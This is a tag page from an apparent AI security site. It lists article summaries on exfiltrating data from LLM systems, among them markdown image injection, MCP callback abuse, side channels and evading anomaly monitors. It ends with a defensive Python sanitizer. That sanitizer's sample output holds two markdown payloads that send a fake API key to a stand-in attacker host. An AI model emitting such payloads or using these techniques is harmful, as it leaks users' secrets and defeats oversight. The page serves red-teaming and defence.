# exfiltration
23 articles tagged with “exfiltration”
- **Link-Based Exfiltration**: Using hyperlinks, redirects, or URL parameters to exfiltrate data from AI systems through markdown links, tool-generated URLs, and API callback exploitation.
- **Markdown Image Injection**: Injecting markdown image tags with attacker-controlled URLs to exfiltrate conversation data via HTTP image requests.
- **Function Calling Data Exfiltration**: Using function calls as data exfiltration channels to extract information from constrained environments.
- **MCP Resource Data Exfiltration**: Methods for extracting sensitive data through MCP resource access patterns and sampling API abuse.
- **MCP Cross-Server Data Exfiltration**: Chain MCP tool calls across servers to exfiltrate data from restricted environments to attacker-controlled endpoints.
- **Tool Call Forensics**: Forensic investigation of agent tool calls: detecting unauthorized tool usage, analyzing parameter manipulation evidence, identifying exfiltration traces, and reconstructing agent action chains.
- **Case Study: GPT Plugin Data Exfiltration**: Analysis of data exfiltration vulnerabilities in the early ChatGPT plugin ecosystem, including cross-plugin attacks.
- **Code Completion Data Exfiltration**: Using code completion interfaces to exfiltrate sensitive data from development environments, including secrets, API keys, and proprietary code.
- **Data Exfiltration via Vector Databases**: Data exfiltration techniques for vector databases: embedding inversion to reconstruct documents, enumeration attacks, and similarity-based data harvesting.
- **Blind Prompt Injection Techniques**: Attacking LLM systems without seeing output: TOCTOU injection, side-channel exfiltration, blind payload delivery, and timing-based exploitation.
- **Lab: RAG Full Chain Attack**: Hands-on lab for executing a complete RAG attack chain from document injection through retrieval manipulation to data exfiltration, targeting every stage of the Retrieval-Augmented Generation pipeline.
- **Markdown Rendering Exfiltration**: Exploit Markdown rendering in chat UIs to exfiltrate data through image tags and links.
- **Data Heist: Multi-Channel Exfiltration**: Exfiltrate a secret key through a heavily monitored LLM system using covert exfiltration channels.
- **Stealth Exfiltration Challenge: Zero Detection**: Exfiltrate data from a monitored LLM system without triggering any of the deployed anomaly detectors.
- **Data Exfiltration via Side Channels**: Extract data from LLM systems using timing, token probability, and formatting side channels.
- **Lab: Markdown-Based Injection**: Hands-on lab exploring how Markdown rendering in AI-generated outputs can be exploited to inject hidden content, exfiltrate data through image tags, and manipulate displayed information.
- **MCP Resource Data Exfiltration (Intermediate Lab)**: Exploit MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.
- **Streaming Response Exfiltration**: Exploit streaming API responses to exfiltrate data that batch output filters would otherwise catch.
- **Lab: Data Exfiltration via Webhooks**: Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.
- **Stealth Data Extraction Techniques**: Stealthy techniques for extracting sensitive data from AI systems without triggering alerts.
- **Callback Abuse in MCP**: Advanced walkthrough of abusing MCP callback mechanisms for unauthorized actions, data exfiltration, and privilege escalation in agent-tool interactions.
- **Cross-Plugin Data Exfiltration Walkthrough**: Walkthrough of chaining multiple plugins/tools to exfiltrate data from LLM agent systems.
- **Output Format Exfiltration Techniques Walkthrough**: Walkthrough of using output format manipulation to exfiltrate data through code blocks, markdown, and structured outputs.
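The markdown image and link entries above (Link-Based Exfiltration, Markdown Image Injection, Markdown Rendering Exfiltration, Lab: Markdown-Based Injection) all depend on the same mechanism: the chat UI fetches, or the user clicks, an attacker URL whose path or query string carries conversation data. The following is an added example, not code from any of the listed articles: a small Python detector and sanitizer for model output before it reaches the renderer. The allowlisted hosts, the constructed sample output, and the "long or base64-looking parameter" thresholds are assumptions chosen for illustration.

```python
"""Detect and neutralise markdown image/link exfiltration in LLM output.

Added example, not taken from any article on this page. Assumptions: the
application renders model output as markdown and legitimately embeds images
and links only from ALLOWED_HOSTS; anything else is treated as a candidate
exfiltration channel (images rated higher, since they fetch without a click).
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed allowlist of hosts the application serves assets/docs from.
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

# Markdown image ![alt](url "title") and link [text](url "title").
# URL must contain no whitespace or ')' (no nested parentheses handled).
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)(?:\s+\"[^\"]*\")?\)")
MD_LINK = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)\s]+)(?:\s+\"[^\"]*\")?\)")


def _allowed(url):
    """Relative paths on our own origin are fine; http(s) to an allowlisted
    host is fine; everything else (other hosts, data:, javascript:) is not."""
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        return True
    return parts.scheme in ("http", "https") and (parts.hostname or "") in ALLOWED_HOSTS


def _suspicious_params(url):
    """Names of query parameters whose values look like smuggled data:
    unusually long, or a base64/hex-style blob. Heuristic thresholds.
    Note parse_qsl turns '+' into a space, so the length check is the
    backstop for base64 values that contain '+'."""
    hits = []
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if len(value) >= 32 or re.fullmatch(r"[A-Za-z0-9+/=_-]{20,}", value):
            hits.append(key)
    return hits


def find_exfil_channels(text):
    """Return one finding per off-allowlist markdown image or link."""
    findings = []
    for kind, pattern in (("image", MD_IMAGE), ("link", MD_LINK)):
        for m in pattern.finditer(text):
            url = m.group(2)
            if _allowed(url):
                continue
            findings.append({
                "kind": kind,
                "url": url,
                "host": urlsplit(url).hostname or "",
                "params": _suspicious_params(url),
                "severity": "high" if kind == "image" else "medium",
            })
    return findings


def sanitize(text):
    """Drop off-allowlist images entirely and turn off-allowlist links into
    plain text (URL visible to the user, but not clickable or auto-fetched)."""
    def _img(m):
        return m.group(0) if _allowed(m.group(2)) else f"[image removed: {m.group(1)}]"

    def _lnk(m):
        return m.group(0) if _allowed(m.group(2)) else f"{m.group(1)} ({m.group(2)})"

    # Images first, so the link pattern never has to deal with the '!' form.
    text = MD_IMAGE.sub(_img, text)
    return MD_LINK.sub(_lnk, text)


# Constructed sample of model output: one benign image, one benign link, and
# two exfiltration attempts carrying a fake secret in the query string.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![status](https://cdn.example.com/ok.png)\n"
    "![loading](https://attacker.invalid/i.png?d=dXNlcj1hbGljZTthcGlfa2V5PXNrLTEyMzQ1Njc4OTA=)\n"
    "More details in [the docs](https://docs.example.com/guide) or "
    "[here](https://attacker.invalid/c?s=sk-1234567890abcdef1234567890abcdef)."
)

if __name__ == "__main__":
    for f in find_exfil_channels(SAMPLE_OUTPUT):
        print(f"{f['severity']:6} {f['kind']:5} {f['host']} params={f['params']}")
    print(sanitize(SAMPLE_OUTPUT))
```

Run `find_exfil_channels` on every model response as a detection signal (a markdown image pointing off-allowlist with a long query parameter is close to a guaranteed true positive) and `sanitize` as the rendering-side control; the allowlist is the real defence, the parameter heuristics only help triage.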